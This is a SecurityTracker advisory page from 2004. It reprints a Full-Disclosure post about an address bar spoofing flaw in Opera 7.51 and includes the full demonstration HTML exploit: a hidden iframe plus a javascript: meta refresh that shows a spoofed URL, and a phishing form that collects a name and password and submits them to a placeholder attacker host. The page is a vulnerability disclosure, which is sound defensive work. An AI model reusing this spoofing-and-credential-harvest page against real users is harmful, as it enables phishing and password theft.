SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar
SecurityTracker Alert ID:  1010528
SecurityTracker URL:  http://securitytracker.com/id/1010528
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 18 2004
Impact:   Modification of user information
Exploit Included:  Yes  
Version(s): 7.51
Description:   A scripting vulnerability was reported in the Opera browser. A remote user can create HTML that will spoof an arbitrary URL in the status bar.

bitlance winter reported that a remote user can create HTML that, when loaded by the target user, will set the URL in the status bar to an arbitrary URL.

The HTML includes an IFrame within a cascading style sheet definition and a zero second HTML Refresh statement containing a javascript command. The source URL of the iframe will be listed in the address bar.

This exploit can be used in "phishing" attacks.

Impact:   A remote user can spoof the address bar.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 16 2004 (Additional Exploit Code is Available) Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar
Some additional demonstration exploit code is available.



 Source Message Contents

Subject:  [Full-Disclosure] Opera Browser version 7.51 Address Bar Spoofing Vulnerability


Hi List.

A vulnerability is found in the Opera browser version 7.51 , which can be 
exploited by spammers to spoof information displayed in the address 
bar.Tested on Windows OS.

Demonstration HTML source code:

======== begin ========
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
  content="0;url=javascript:(function(){})();"]
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[/script]
[style type="text/css"]
[!-- /* hide iframe element. */
  iframe {
         display: none !important;
         }
/* hide iframe element. */ --]
[!-- /* pizza form */
  body {
         margin-left: 2em;
         margin-right: 2em;
         font-family:verdana;
         font-size:80%;
       }
  h1 { font-size:120%;}
  h2 { font-size:100%;}
  table { font-size:85%; background-color:buttonface; }
  table caption {
    background-color:activecaption; color:captiontext;
    font-weight:bold; text-align:left; }
  table table { font-size:100%; }
  table input { font-family:verdana; font-size:100%; }
  table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[/style]
[/head]
[body]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need 
Online"]
Opera 7.51[/a], Everything You Need Online
[/p]
[iframe title="inline frame spoofing address bar"
src="https://pizza.opera.com/order.html"]
This inline frame is hidden. See CSS.
[/iframe]
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
  [td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
  [td][input type="text" name="txtName" id="txtName"][/td]
[/tr]
[tr valign="top"]
  [td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
  [td][input type="password" name="txtPassword" id="txtPassword"][/td]
[/tr]
[tr valign="top"]
  [td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
  [td]
    [select name="selSize" id="selSize"]
    [option value="0"]--- pick a size --- [/option]
    [option value="1"]Small[/option]
    [option value="2"]Medium[/option]
    [option value="3"]Large[/option]
    [/select]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2"]
    [fieldset id="fstCrust"]
    [legend]Crust[/legend]
    [table cellpadding="1" cellspacing="0"]
    [tr]
      [td][input type="radio" name="radCrust" id="radCrust_Thick" 
value="Thick"][/td]
      [td][label for="radCrust_Thick" 
accesskey="K"]Thic[u]k[/u][/label][/td]
      [td][input type="radio" name="radCrust" id="radCrust_Thin" 
value="Thin"][/td]
      [td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
    [/tr]
    [/table]
    [/fieldset]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2"]
    [fieldset id="fstToppings"]
    [legend]Toppings[/legend]
    [table cellpadding="1" cellspacing="0"]
    [tr]
      [td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
      [td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
    [/tr]
    [tr]
      [td][input type="checkbox" name="chkPineapple" id="chkPineapple" 
value="Pineapple"][/td]
      [td][label for="chkPineapple" 
accesskey="I"]P[u]i[/u]neapple[/label][/td]
    [/tr]
    [tr]
      [td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese" 
value="Extra Cheese"][/td]
      [td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra 
Cheese[/label][/td]
    [/tr]
    [/table]
    [/fieldset]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2" align="right"][input type="submit" value="   Order!   
"][/td]
[/tr]
[/table]
[/form]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter

P.S.
I tender my acknowledgment to my godparent who has named 'bitlance'.

_________________________________________________________________
Watch the online reality show Mixed Messages with a friend and enter to win 
a trip to NY 
http://www.msnmessenger-download.click-url.com/go/onm00200497ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC